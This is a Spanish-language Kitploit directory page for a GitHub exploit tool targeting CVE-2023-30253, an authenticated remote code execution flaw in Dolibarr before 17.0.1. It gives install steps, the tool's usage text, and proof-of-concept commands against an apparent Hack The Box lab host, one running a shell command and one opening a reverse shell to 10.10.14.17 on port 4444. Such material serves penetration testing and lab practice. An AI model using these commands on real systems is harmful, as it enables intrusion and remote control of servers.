Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2023-30253 — Dolibarr antes de 17.0.1 permite ejecución remota de código por un usuario autenticado mediante una manipulación de mayúsculas: <?PHP en lugar de <?php en datos inyectados. | Kitploit
Herramientas/GitHubGitHub/rubikcuv5/cve-2023-30253
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubrubikcuv5/cve-2023-30253

cve-2023-30253

Dolibarr antes de 17.0.1 permite ejecución remota de código por un usuario autenticado mediante una manipulación de mayúsculas: <?PHP en lugar de <?php en datos inyectados.

Ver Repositorio
7hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-30253

image

Descripción

Dolibarr anterior a la versión 17.0.1 permite la ejecución remota de código por parte de un usuario autenticado mediante una manipulación de mayúsculas: <?PHP en lugar de <?php en los datos inyectados.

Documentación

  • CVE-2023-30253
  • Aviso de GitHub: GHSA-9wqr-5jp4-mjmh

Configuración

root@kitploit:~
git clone https://github.com/Rubikcuv5/cve-2023-30253.git

pip3 install -r requirements.txt

python3 CVE-2023-30253.py -h

USO

root@kitploit:~
usage: CVE-2023-30253.py [-h] [--url URL] [-u USER] [-p PASSWORD] (-c COMMAND | -r ip port)

Analizador de argumentos

options:
  -h, --help            muestra este mensaje de ayuda y sale
  --url URL             URL del sitio web
  -u USER, --user USER  Nombre de usuario
  -p PASSWORD, --password PASSWORD
                        Contraseña
  -c COMMAND, --command COMMAND
                        Comando a ejecutar
  -r ip port, --reverseshell ip port
                        IP y puerto de la shell inversa

EJEMPLOS POC

Ejecutar un comando

root@kitploit:~
python3 CVE-2023-30253.py --url http://crm.board.htb -u admin -p admin -c "ls -l"

image

Obtener una shell inversa

root@kitploit:~
 python3 CVE-2023-30253.py --url http://crm.board.htb -u admin -p admin -r  10.10.14.17  4444

image

Autor

  • Rubickcuv
Descargar herramienta